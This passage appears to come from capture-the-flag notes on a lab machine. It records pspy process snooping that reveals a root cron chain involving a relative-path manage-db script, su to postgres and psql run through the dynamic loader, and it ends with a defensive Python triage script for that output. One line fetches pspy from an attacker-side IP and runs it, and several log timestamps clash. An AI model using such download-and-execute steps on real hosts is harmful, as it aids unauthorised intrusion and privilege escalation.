PSPY
A root cronjob process was discovered
wesley@download:/dev/shm$ wget -q http://10.10.14.20/pspy64 ; chmod 755 ./pspy64
Delivery complete
wesley@download:/dev/shm$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
Executing PSPY
PostgreSQL
2023/08/09 15:16:06 CMD: UID=0 PID=36139 | /usr/sbin/sshd -D -R
2023/08/09 15:16:06 CMD: UID=112 PID=36142 | sshd: [net]
2023/08/09 15:16:06 CMD: UID=0 PID=36154 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36153 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36152 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36151 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36150 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36149 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36148 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36147 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36146 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36145 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36144 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36143 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2023/08/09 15:16:06 CMD: UID=0 PID=36157 | /bin/sh /etc/update-motd.d/00-header
2023/08/09 15:16:06 CMD: UID=0 PID=36156 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36155 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:06 CMD: UID=0 PID=36158 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36161 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36160 | uname -o
2023/08/09 15:16:06 CMD: UID=0 PID=36159 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36162 | /bin/sh /etc/update-motd.d/00-header
2023/08/09 15:16:06 CMD: UID=0 PID=36163 | /bin/sh /etc/update-motd.d/00-header
2023/08/09 15:16:06 CMD: UID=0 PID=36164 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:06 CMD: UID=0 PID=36165 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36166 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36171 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36170 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36169 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36168 | /bin/sh /etc/update-motd.d/50-landscape-sysinfo
2023/08/09 15:16:06 CMD: UID=0 PID=36167 | /lib/systemd/systemd-udevd
2023/08/09 15:16:06 CMD: UID=0 PID=36173 | /bin/date
2023/08/09 15:16:06 CMD: UID=0 PID=36174 | /usr/bin/python3 /usr/bin/landscape-sysinfo
2023/08/09 15:16:07 CMD: UID=0 PID=36177 |
2023/08/09 15:16:07 CMD: UID=0 PID=36178 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:07 CMD: UID=0 PID=36180 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36179 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36182 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36181 | /bin/sh /etc/update-motd.d/50-motd-news
2023/08/09 15:16:07 CMD: UID=0 PID=36183 | run-parts --lsbsysinit /etc/update-motd.d
2023/08/09 15:16:07 CMD: UID=0 PID=36184 | /bin/sh /etc/update-motd.d/90-updates-available
2023/08/09 15:16:07 CMD: UID=0 PID=36185 |
2023/08/09 15:16:07 CMD: UID=0 PID=36187 | grep -q -m 1 .
2023/08/09 15:16:07 CMD: UID=0 PID=36186 |
2023/08/09 15:16:07 CMD: UID=0 PID=36188 | /bin/sh /usr/share/update-notifier/notify-updates-outdated
2023/08/09 15:16:07 CMD: UID=0 PID=36189 | gettext The list of available updates is more than a week old.
2023/08/09 15:16:07 CMD: UID=0 PID=36190 | gettext To check for new updates run: sudo apt update
2023/08/09 15:16:07 CMD: UID=0 PID=36191 | /bin/sh /etc/update-motd.d/91-contract-ua-esm-status
2023/08/09 15:16:07 CMD: UID=0 PID=36192 | /bin/sh /etc/update-motd.d/91-release-upgrade
2023/08/09 15:16:07 CMD: UID=0 PID=36195 | cut -d -f4
2023/08/09 15:16:07 CMD: UID=0 PID=36194 | /usr/bin/python3 -Es /usr/bin/lsb_release -sd
2023/08/09 15:16:07 CMD: UID=0 PID=36193 | /bin/sh /etc/update-motd.d/91-release-upgrade
2023/08/09 15:16:07 CMD: UID=0 PID=36196 | id -u
2023/08/09 15:16:07 CMD: UID=0 PID=36201 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36202 | systemd-detect-virt -q -c
2023/08/09 15:16:07 CMD: UID=0 PID=36203 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36204 | apt-config shell StateDir Dir::State
2023/08/09 15:16:07 CMD: UID=0 PID=36205 | apt-config shell ListDir Dir::State::Lists
2023/08/09 15:16:07 CMD: UID=0 PID=36206 | apt-config shell ListDir Dir::State::Lists
2023/08/09 15:16:07 CMD: UID=0 PID=36207 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36208 | apt-config shell DpkgStatus Dir::State::status
2023/08/09 15:16:07 CMD: UID=0 PID=36209 |
2023/08/09 15:16:07 CMD: UID=0 PID=36211 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36212 | apt-config shell SourceList Dir::Etc::sourcelist
2023/08/09 15:16:07 CMD: UID=0 PID=36213 |
2023/08/09 15:16:07 CMD: UID=0 PID=36214 | id -u
2023/08/09 15:16:07 CMD: UID=0 PID=36216 | dirname /var/lib/update-notifier/hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36215 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36217 | cat /var/lib/update-notifier/hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36218 | /bin/sh -e /usr/lib/update-notifier/update-motd-hwe-eol
2023/08/09 15:16:07 CMD: UID=0 PID=36219 |
2023/08/09 15:16:07 CMD: UID=0 PID=36220 | /bin/sh /etc/update-motd.d/97-overlayroot
2023/08/09 15:16:07 CMD: UID=0 PID=36223 | /bin/sh /etc/update-motd.d/98-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36224 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36225 | stat -c %Y /var/lib/update-notifier/fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36226 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36227 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36228 | date +%s
2023/08/09 15:16:07 CMD: UID=0 PID=36229 | /bin/sh /usr/lib/update-notifier/update-motd-fsck-at-reboot
2023/08/09 15:16:07 CMD: UID=0 PID=36230 | /bin/sh /etc/update-motd.d/98-reboot-required
2023/08/09 15:16:07 CMD: UID=0 PID=36231 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36233 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36235 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36234 |
2023/08/09 15:16:07 CMD: UID=0 PID=36236 | /bin/sh /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36237 | basename /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36239 |
2023/08/09 15:16:07 CMD: UID=0 PID=36238 | /bin/sh /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36240 | -bash
2023/08/09 15:16:07 CMD: UID=0 PID=36241 | mesg n
2023/08/09 15:16:07 CMD: UID=0 PID=36242 | /bin/bash -i ./manage-db
2023/08/09 15:16:07 CMD: UID=0 PID=36243 | groups
2023/08/09 15:16:07 CMD: UID=0 PID=36244 | /bin/bash -i ./manage-db
2023/08/09 15:16:07 CMD: UID=0 PID=36245 | basename /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36246 | /bin/sh /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36247 | dirname /usr/bin/lesspipe
2023/08/09 15:16:07 CMD: UID=0 PID=36248 | dircolors -b
2023/08/09 15:16:07 CMD: UID=0 PID=36249 | systemctl status postgresql
2023/08/09 16:16:07 CMD: UID=0 PID=36250 | systemctl status download-site
2023/08/09 15:16:07 CMD: UID=0 PID=36251 | /bin/bash -i ./manage-db
2023/08/10 02:53:40 CMD: UID=0 PID=36252 | su -l postgres
2023/08/09 15:16:07 CMD: UID=113 PID=36253 | groups
2023/08/09 15:16:07 CMD: UID=113 PID=36254 | -bash
2023/08/09 15:16:07 CMD: UID=113 PID=36256 | -bash
2023/08/09 15:16:07 CMD: UID=113 PID=36255 | locale
2023/08/09 15:16:12 CMD: UID=113 PID=36257 | /usr/bin/perl /usr/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36258 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36260 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36259 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36261 | /lib64/ld-linux-x86-64.so.2 --verify /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36262 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36263 | /bin/bash /usr/bin/ldd /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36264 | /lib64/ld-linux-x86-64.so.2 /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36265 | /usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main -c config_file=/etc/postgresql/12/main/postgresql.conf
- The above commands are executed at an interval of 1 minute.
- The `root` user logs in to the host machine via SSH.
    - `systemctl status postgresql` and `systemctl status download-site` are called.
    - `/bin/bash -i ./manage-db` is then executed.
    - `su -l postgres` is then executed.
- A user with `UID=113` then gains a shell session.
    - `UID=113` then executes `/usr/bin/perl /usr/bin/psql`, to list out the shared library dependencies (the `ldd` calls above).
    - `/lib64/ld-linux-x86-64.so.2 --verify /usr/lib/postgresql/12/bin/psql` - the command is used to verify the compatibility and consistency of the PostgreSQL `psql` executable and its associated shared libraries using the dynamic linker/loader.
        - `/lib64/ld-linux-x86-64.so.2`: This is the dynamic linker/loader for 64-bit Linux systems. It is responsible for loading and linking the shared libraries needed by executable files.
        - `--verify`: This is an option provided to the dynamic linker/loader. It instructs the dynamic linker to verify the consistency and compatibility of a given executable and its associated libraries.
        - `/usr/lib/postgresql/12/bin/psql`: This is the path to the `psql` executable of PostgreSQL version 12. `psql` is the interactive terminal for working with PostgreSQL databases.
    - `/lib64/ld-linux-x86-64.so.2 /usr/lib/postgresql/12/bin/psql` ^af8bf7
        - The dynamic linker/loader (`ld-linux-x86-64.so.2`) is being used explicitly to execute the `psql` command.
        - In a typical scenario, you would execute the `psql` command directly without invoking the dynamic linker/loader. The dynamic linker/loader is responsible for loading and linking the shared libraries needed by executable files. By directly invoking the dynamic linker/loader, you are essentially bypassing the normal execution process. While this command might work and launch the `psql` interactive terminal, it is unusual and not the recommended way to execute the `psql` command.
    - `/usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main -c config_file=/etc/postgresql/12/main/postgresql.conf`
        - The command is used to start the PostgreSQL database server with specific configuration options. ^db6537
        - `/usr/lib/postgresql/12/bin/postgres`: This is the path to the `postgres` executable of PostgreSQL version 12. It is the main executable for the PostgreSQL database server.
        - `-D /var/lib/postgresql/12/main`: The `-D` option specifies the data directory where PostgreSQL stores its data files and database content. In this case, the data directory is set to `/var/lib/postgresql/12/main`.
        - `-c config_file=/etc/postgresql/12/main/postgresql.conf`: The `-c` option is used to set a configuration parameter for the PostgreSQL server. Here, the `config_file` parameter is set to specify the location of the PostgreSQL configuration file (`postgresql.conf`). The configuration file for this command is located at `/etc/postgresql/12/main/postgresql.conf`.
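The observations above are the kind a defender wants turned into an alert rather than read by eye: root handing `bash` a script by relative path, a root shell dropping to another user with `su`, and a binary launched through the dynamic loader instead of being executed directly. The script below is an added triage example, not part of these notes and not pspy's own code; it parses pspy `CMD:` lines and applies those three rules. The sample lines are copied from the capture above; the rule names, the relative-path heuristic and the report layout are my own assumptions.

```python
"""Triage of a pspy capture (added example; not part of these notes or of the
pspy project). It parses pspy's CMD lines and flags the events discussed above:
root handing bash a relative-path script, root dropping to another user with su,
and a binary being launched through the dynamic loader. Rule names, the
relative-path heuristic and the report format are my own assumptions."""
import re

# Constructed sample: a subset of lines copied from the capture above.
SAMPLE_LOG = """\
2023/08/09 15:16:06 CMD: UID=0 PID=36139 | /usr/sbin/sshd -D -R
2023/08/09 15:16:07 CMD: UID=0 PID=36234 |
2023/08/09 15:16:07 CMD: UID=0 PID=36242 | /bin/bash -i ./manage-db
2023/08/09 15:16:07 CMD: UID=0 PID=36249 | systemctl status postgresql
2023/08/10 02:53:40 CMD: UID=0 PID=36252 | su -l postgres
2023/08/09 15:16:07 CMD: UID=113 PID=36254 | -bash
2023/08/09 15:16:12 CMD: UID=113 PID=36257 | /usr/bin/perl /usr/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36261 | /lib64/ld-linux-x86-64.so.2 --verify /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36264 | /lib64/ld-linux-x86-64.so.2 /usr/lib/postgresql/12/bin/psql
2023/08/09 15:16:12 CMD: UID=113 PID=36265 | /usr/lib/postgresql/12/bin/postgres -D /var/lib/postgresql/12/main -c config_file=/etc/postgresql/12/main/postgresql.conf
"""

# One pspy event line: "<date> <time> CMD: UID=<n> PID=<n> | <argv...>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: "
    r"UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s?(?P<cmd>.*)$"
)
# The glibc dynamic loader, e.g. /lib64/ld-linux-x86-64.so.2 or /lib/ld.so
LOADER_RE = re.compile(r"(^|/)ld(-[\w-]*)?\.so(\.\d+)?$")


def parse_pspy(text):
    """Return one dict per CMD line. A process that exited before pspy could
    read its /proc/<pid>/cmdline shows up with an empty argv, as in the capture."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # banner, config and "Draining ..." lines are not events
        events.append({
            "ts": m["ts"],
            "uid": int(m["uid"]),
            "pid": int(m["pid"]),
            "argv": m["cmd"].split(),
        })
    return events


def triage(events):
    """Return (rule, pid, detail) tuples for the patterns worth an alert."""
    findings = []
    for e in events:
        argv = e["argv"]
        if not argv:
            continue
        prog, args = argv[0], argv[1:]
        # Root running a script addressed relative to its cwd ("./manage-db"):
        # which file actually runs depends on where the cron job was started.
        if e["uid"] == 0 and any(a.startswith(("./", "../")) for a in args):
            findings.append(("root_relative_script", e["pid"], " ".join(argv)))
        # Root switching identity with su: record the privilege drop and its target.
        if e["uid"] == 0 and prog.rsplit("/", 1)[-1] == "su":
            target = next((a for a in args if not a.startswith("-")), "root")
            findings.append(("su_drop", e["pid"], f"root -> {target}"))
        # Explicit use of the loader: "--verify" only checks the ELF, anything
        # else runs the binary through ld.so instead of exec'ing it directly.
        if LOADER_RE.search(prog):
            rule = "loader_verify" if "--verify" in args else "loader_exec"
            findings.append((rule, e["pid"], " ".join(args)))
    return findings


def processes_by_uid(events):
    """Count observed processes per UID, to see who is active in the window."""
    counts = {}
    for e in events:
        counts[e["uid"]] = counts.get(e["uid"], 0) + 1
    return counts


if __name__ == "__main__":
    evs = parse_pspy(SAMPLE_LOG)
    print("processes per UID:", processes_by_uid(evs))
    for rule, pid, detail in triage(evs):
        print(f"{rule:22} PID={pid:<6} {detail}")
```

Run against a full pspy capture (`./pspy64 | tee pspy.log`, then feed the file to `parse_pspy`), the report separates the one-minute cron chain from the noise of `update-motd.d` and `systemd-udevd` and leaves four lines: the relative-path `manage-db` run, the `su -l postgres` drop, and the two loader invocations, with `--verify` reported separately because it only checks the ELF rather than running it.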